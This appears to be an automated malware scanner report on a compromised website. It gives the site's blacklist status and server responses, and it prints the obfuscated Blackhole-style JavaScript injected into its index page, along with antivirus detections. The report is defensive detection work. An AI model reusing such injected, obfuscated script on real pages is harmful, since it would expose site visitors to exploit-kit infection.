New scan:

Malware Scanner report for sons-of-art.com

Malicious/Suspicious/Total urls checked
1/0/3
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "sons-of-art.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=sons-of-art.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://sons-of-art.com/
HTTP/1.1 200 OK
Date: Wed, 10 Sep 2014 10:31:21 GMT
Accept-Ranges: bytes
ETag: "d5f65bc3839bce1:aea6b"
Server: Microsoft-IIS/6.0
Content-Length: 5407
Content-Location: http://sons-of-art.com/index.htm
Content-Type: text/html
Last-Modified: Sat, 17 Aug 2013 19:55:46 GMT
X-Powered-By: ASP.NET
clean
http://sons-of-art.com/index.htm
200 OK
Content-Length: 5407
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

z="y";vz="d"+"oc"+"ument";ps="s"+"plit";try{+function(){++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^81^87^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^75^7d^34^48^1a^17^
... 3486 bytes are skipped ...
80^81^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^81^87^3d^46^35^36^48^1a^17^8a^1a^17^8a"[ps](a2);za="";aa("arCode");e(""+za);}

Antivirus reports:

AntiVir
JS/Blacole.DQ.1
Avast
JS:Decode-BKS [Trj]
Ikarus
Virus.JS.Exploit
nProtect
JS:Exploit.BlackHole.BH
TrendMicro-HouseCall
TROJ_GEN.F47V0829
Comodo
Exploit.JS.Blacole.EH
McAfee-GW-Edition
JS/Exploit-Blacole.gc
DrWeb
Exploit.BlackHole.197
Kaspersky
Trojan.JS.Redirector.zu
Microsoft
Trojan:JS/BlacoleRef.DD
MicroWorld-eScan
JS:Exploit.BlackHole.BH
Fortinet
JS/Kryptik.HOL!tr
McAfee
JS/Exploit-Blacole.gc
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.BH
AVG
JS/Exploit
Norman
Blacole.VZ
GData
JS:Exploit.BlackHole.BH
Commtouch
Trojan.ZHEK-0
BitDefender
JS:Exploit.BlackHole.BH

http://sons-of-art.com/test404page.js
404 Not Found
Content-Length: 1635
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: sons-of-art.com

Result:
HTTP/1.1 200 OK
Date: Wed, 10 Sep 2014 10:31:21 GMT
Accept-Ranges: bytes
ETag: "d5f65bc3839bce1:aea6b"
Server: Microsoft-IIS/6.0
Content-Length: 5407
Content-Location: http://sons-of-art.com/index.htm
Content-Type: text/html
Last-Modified: Sat, 17 Aug 2013 19:55:46 GMT
X-Powered-By: ASP.NET

...5407 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sons-of-art.com
Referer: http://www.google.com/search?q=sons-of-art.com

Result:
The result is similar to the first query. There are no suspicious redirects found.